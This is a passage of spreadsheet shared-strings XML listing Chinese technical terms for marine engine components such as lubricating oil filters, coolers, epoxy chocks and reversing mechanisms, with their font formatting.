        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油管支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油管支路</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴向减震器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油柜</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油过滤器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油过滤器布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油过滤器的安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油过滤器套件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油过滤器箱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油过滤器元件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油含水监测</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油和燃油管系的清洁和处理</t>
    </r>
    <phoneticPr fontId="3" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油恒温阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油恒温器布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油进口泵</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油进口管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油进口冷却器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油进口滤器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油孔清洗</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油冷却器插芯</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油冷却器出口</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油冷却器低温水入口</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油冷却器高温水出口</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油冷却器高温水进口</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油冷却器故障排除</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油冷却器冷却水出口</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油冷却器冷却水管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油冷却器清单</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油冷却器用工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油冷却器支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油连接管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油滤器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油滤器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油滤器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油滤器的支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油滤器供货图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油滤器护罩</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油滤器外形图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油滤器支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油滤清器轴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油满流过滤器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油盘</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油歧管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮轴铭牌</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油温控阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油温控元件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油吸入管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油系统，顶置油柜</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油系统，主要及辅助系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油系统</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>II</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油系统错误</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油系统分油机</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油系统供货图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油系统滤器清洗</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油系统详细</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油箱规格</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油消耗率</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油压力调节器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油油压限制阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油与冷却油</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油预滤器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油原理图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器铭牌</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机铭牌</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油状况维护</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑油组件布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑座和衬套总成</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑座螺母</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>化学成分分析取样</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>化学清洗布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>环扳手</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>环槽</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>环槽测量工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>环槽螺栓</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>环刀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>环形螺母</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>环氧树脂安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>环氧树脂安装软管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>环氧树脂垫块布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>环氧树脂垫信息</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>环氧树脂工具</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>环氧树脂浇注数据列表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>环氧树脂数据列表</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>环状阳极</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>环状撞击扳手</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缓冲器法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缓冲器活塞</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缓冲器壳体</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缓冲器与吸入阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>换热器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>换向（液压）</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>换向臂</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>换向布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>换向衬套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>换向导套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>换向垫片</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>换向盖垫圈</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>换向过滤器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>换向和起动布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>换向机构</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>换向机构布置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>换向机构的调整</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>换向机构和链条</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
